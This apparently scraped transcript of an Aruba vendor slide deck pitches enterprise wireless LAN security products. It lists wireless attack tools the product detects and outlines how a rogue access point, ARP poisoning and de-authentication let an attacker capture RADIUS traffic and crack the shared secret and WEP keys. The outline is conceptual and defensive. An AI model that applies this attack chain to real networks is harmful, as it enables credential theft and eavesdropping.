Getting Smart About Wireless Security

Getting Smart About Wireless Security

The Existence of Wireless LANs is a Security Threat – A Case Study New York City Your Company Your employee • Employee’s a subscriber to public Wi-Fi hotspot service • Employee’s laptop automatically associates with public Wi-Fi hotspot • Plugs into wired corporate network • Traffic bridged between public hotspot and enterprise network

Mobility Is An Interior Security ThreatConventional Perimeter Security Has Been Rendered Irrelevant • Wireless LAN technology is a wired security threat • New mobile users, devices appearing everyday • Traditional security products do not work for mobility • Insecure, poor performance, expensive, breaks mobility • Security needs to be addressed from the inside out

Aruba Solution: Internal Mobile SecurityConventional Perimeter Security Has Been Rendered Irrelevant 5. LOCK THE RESOURCES 4. LOCK THE DEVICE 3. LOCK THE USER 2. LOCK THE WIRE 1. LOCK THE AIR

Aruba At A GlanceAt the Intersection of Mobility, Wireless and Security • Founded: February, 2002 • Investors: Sequoia, Matrix, Trinity, WK Technology • Funding: $77M To-Date , Nearing Profitability • Traction: Hundreds of Major Customers • Employees: 130 • Patents: Multiple Key Patents • Industry Recognition:

CORPORATENETWORK Employees INTERNET ACCESS Visitors VOIPSERVICES Voice Open Ports Guest Laptop Aruba’s Centralized Security SolutionsSecurity from the Inside Out Email, Web, Storage Servers OSDP Partners IPTransport Lock The Air Easy Deployment of Secure WLAN Plug Holes in Exposed WLANs Protect Users, Devices, Networks from Worms and Viruses Create & Enforce Corporate Policies Defend Exposed Wired Ports

ARUBA 2400 How It’s Deployed:Non-disruptive to Existing Network DATA CENTER DEPLOYMENT WIRING CLOSET DEPLOYMENT FLOOR 1 FLOOR 1 ARUBA 800 FLOOR 2 FLOOR 2 10/100 Mbps 10/100 Mbps DATA CENTER DATA CENTER ARUBA 5000 BACKBONE BACKBONE

Intrusion Detection and Prevention Hackers Can Trap Users, Grab Data and Pretend to be Valid Users Wireless Intrusion Detection

Monkey Jack Associate Flood ESSID Jack Void 11 AirJack Auth Flood Wellenreiter ASLEAP HostAP KISMET FakeAP Flood WLAN Jack Ttcp-WiFi DeAuth Flood A Myriad of Intrusion Tools / Techniques

All Are Detected, Stations Blacklisted

MAC Address Spoofing Detection

De-Auth Attacks

Netstumbler

Aruba Solution: Internal Mobile SecurityDefense In Depth: Locking Down In Layers 5. LOCK THE RESOURCES 4. LOCK THE DEVICE 3. LOCK THE USER 2. LOCK THE WIRE 1. LOCK THE AIR

Anyone can tap into internal corporate networks The Internal Network is Insecure Case Study: Rogue Access Points

Getting Your RADIUS Password is Simple • Hacker finds rogue access point before you do Uses ARP poisoning to sniff all the traffic between the AP and the gateway RADIUS Server Sends a De-authentication packet to a client De-Auth

How safe are your RADIUS passwords? Getting Your RADIUS Password is Simple • Hacker finds rogue access point before you do Uses ARP poisoning to sniff all the traffic between the AP and the gateway Access Challenge RADIUS Server Sends a de-authentication packet to a client Client automatically re-authenticates AP sends requests to the RADIUS server With just 2 packets and less than 1 second with a rogue AP, a hacker can perform an offline dictionary attack on your RADIUS server shared secret Access Request ?

Access Accept How safe is your data? So Is Getting ALL Your Data Client finishes authentication and the AP sends the request to the RADIUS server RADIUS Server RADIUS server accepts the user, and passes the encrypted keys to the AP Since the hacker will find out your RADIUS password, they will know your dynamic WEP keys too! Access Request With your WEP keys, all traffic can be sniffed directly.

What Do I Do?

Safety with Aruba (Rogue Prevention) • AP detection • See all APs • AP classification • Are they neighbors? • Or are they a threat? • Rogue destruction • Stop users from accessing rogue APs and leave neighbors alone

Access Accept Safety with Aruba (Centralized Encryption) Client finishes authentication and the AP sends the wireless packet to the switch The switch sends an access request to the RADIUS server RADIUS Server The RADIUS server sends the accept and encrypted keys to the switch Access Request All encryption is processed centrallyNO keys are distributed to APs Your keys never leave the data center

Authenticating The User (802.1X) 802.1x supplicant • 802.1X support for explicit and stateful modes • 802.11 Encryption • WEP -- static and 802.1X dynamic WEP • TKIP • AES • 802.11 Authentication methods • EAP-PEAP (Cisco and Microsoft versions) • EAP-LEAP (Cisco) • EAP-TLS & EAP-TTLS • Extensive support for 3rd party authentication servers Contractor Employee 802.1X authenticator Authentication server

Other Authentication Methods • For Fat and Thin APs: • Wireless VPNs • Captive Portal/Web Authentication • Stateful 802.1X Authentication (For Fat APs) • MAC Authentication (For Dumb Devices)

Wireless VPNs (Layer 3) From the DMZ to the Intranet DMZ Enterprises have sacrificed scalability for security Mobility limited to a single VLAN

Remote access vs. Internal access Low speed (Mbps) vs. High Speed (Gbps) Fixed user vs.mobile user VPN Client vs. VPN Dialer RASVPNs WLANVPNs Wireless VPNsMobility Mandates New Model To Ensure Privacy INTERNET

RSA Certification for 2-factor Authentication • Industry’s most prestigious security certification for two-factor authentication • Aruba extends certification with SecurID caching • Critical in environments where two-factor authentication is mandated • 365/24/7 RSA support for customers using tokens on Aruba products

Corporate Laptop Personal Laptop FAIL PASS Dual Stage AuthenticationEnsures Only Authorized Devices Can Be Used to Access Network • Aruba enforces machine authentication before user authentication • If the device cannot be authenticated, Aruba denies user(s) access or places in restricted role even if valid username and password has been provided • Ideal for protecting against personal computers that are likely to be infected with viruses RADIUS Domain Controller Same U/N and Password

Same Corporateemployee What’s Device Remediation ? Corporateemployee • Ensuring endpoint integrity through automatic security checks • Protecting the network from viruses by requiring stations to pass pre-defined security policies before entering the network • Pass = network access • Fail = redirection to URL for remediation • Reduces enterprise exposure to security vulnerabilities and targeted attacks

Quarantine 4 Healthy 1 3 2 Device Remediation with Zone Labs Zone Integrity client 1. Pre-defined security policies defined at Zone Integrity server MSFT 802.1x supplicant 2. Upon entering network, user authentication, via 802.1X, is initiated 3. Once authenticated,users are sent to Zone Labs Integrity server for security testing 4. If user passes security checks, network access is allowed. If user fails, Aruba Wi-Fi switch redirects to URL for remediation or firewalls user into group with restricted access Zone Labs Integrity server Funk SBR 802.1x authentication server

Other Remediation Partnerships • Sygate • Infoexpress (in progress) • Senforce (in progress)

CORPORATENETWORK Employees INTERNET ACCESS Visitors VOIPSERVICES Voice Locking the Resources: What Does It Mean? IPTransport Centralized Wireless LAN Security Programmable Access Points • Enable Secure Network Access Based On[Who, What, When, Where, How]

Step 1: Role-based Separation Trusted user, Trusted host Radius Server Trusted user, Un-trusted host Virtual AP 1 SSID: CORP Un-trusted user Firewall Guest user Virtual AP 2 SSID: GUEST Layer 2 Switch Router CaptivePortal Firewall DHCPPool Default VLAN Aruba Access Point Aruba WLAN Switch

Step 2: Stateful Traffic Policies • Built-in ICSA Certified Stateful Firewall • Brings Application Awareness

USERNAME John Doe PASSWORD <Cached Identity> ROLE Employee AUTHENTICATION RSA SecurID FIREWALL POLICY Don’t allow on Finance Subnets USERNAME John Doe PASSWORD <One Time Password> ROLE Employee AUTHENTICATION RSA SecurID FIREWALL POLICY Don’t allow on Finance Subnets Result: Integrated Mobile SecurityMobile Security Policies based on {Who, What, When, Where, How} Subnet A Wired Intranet Subnet B

VoWLAN Security Issues • All 802.11 DoS/MITM attacks apply to voice • VOIP devices don’t use latest encryption or authentication methods • MAC-based authentication can be compromised • Handsets can be stolen/hijacked • SSIDs set aside for voice can be accessed

Weak Voice without Aruba • Hacker discovers “Voice” SSID, cracks WEP key • Spoofs MAC address to gain access ESSID=Voice WEP

Strong Voice With Voice Flow Classification • Voice policies can be created that only allow specific traffic types (eg. SVP or SIP) while denying all others • If unauthorized traffic is discovered the station can be automatically blacklisted

Voice Flow Classification Technology • Uniquely identifies, classifies and prioritizes voice traffic • Based on Aruba’s user-aware stateful firewall engine • Pre-configured support for Voice Protocols • Spectralink Voice Priority (SVP) • Session Initiation Protocol (SIP) • H.323 • Voice traffic from a PDA or laptop can now be automatically identified, classified and prioritized DATA VOICE

RF sniffers Intranet Firewall Wireless manager Wireless IDS $40K $49K $84K $9K VPN concentrator Security TCO: Solving Costly Integration • Start with a LAN • Add APs and wireless users • Add a firewall to isolate wireless from wired • Plus a VPN server to protect wireless traffic • And something to manage the APs • What about wireless intruders? • Aruba APs are also functions as sniffers • Aruba’s WLAN system integrates a firewall • …and a VPN concentrator • …and wireless intrusion protection • …and RF management and optimization • …and centralized management and policy controls $20K Internet

CORPORATENETWORK Employees INTERNET ACCESS Visitors VOIPSERVICES Voice Extending to Open Wired PortsMobile Security from the Inside Out for Wired and Wireless IPTransport Centralized Security System Open Wired Ports Extend Policies To All Open Ports Based On[Who, What, Where, When, How]

INTEGRATED SWITCHES WIRELESS & SECURITY ARUBA 2400 ARUBA 800 REMOTE MANAGEABILITY A Complete Wi-Fi System in a Single, Scalable Network PlatformFrom System Integration to an Integrated System Firewall VPN Gateway WirelessIntrusionDetection Distributed Wireless Sniffers RF SpectrumManagement Voice

Purpose-Built for Wireless Security ProcessingUnique Architecture Enables New Wireless Applications Wireless Control Processor Wireless Packet Processor Wireless Security Processor L2/L3 Switch with Serial & Power over Ethernet (SPOE)

Cheaper Faster Better • Dense deployments • Centralized radio calibration • High-performance switching • Real-time air monitoring and performance optimization • Centralized switching, thin APs • Dynamic AP management • Out-of-ceiling deployment • Enterprise-class switching platform • Programmable APs • Modular software architecture Why Aruba?

You’re Not Alone…

Getting Smart About Wireless Security

Getting Smart About Wireless Security

Presentation Transcript

WELCOME Getting Smart About Home Modifications

Wireless Security

GETTING SMART

Wireless security

Wireless Security

Wireless Security

Wireless Security

Wireless Security

Wireless Security

Wireless Security

Smart Card Security in Wireless Network Transmission

Getting SMART about Adapting Interventions

Wireless Security

Wireless Security

Wireless Security

Wireless Security

Wireless Security

Wireless Security

Getting smart about cocaine

Wireless Security

Wireless Security

Wireless Security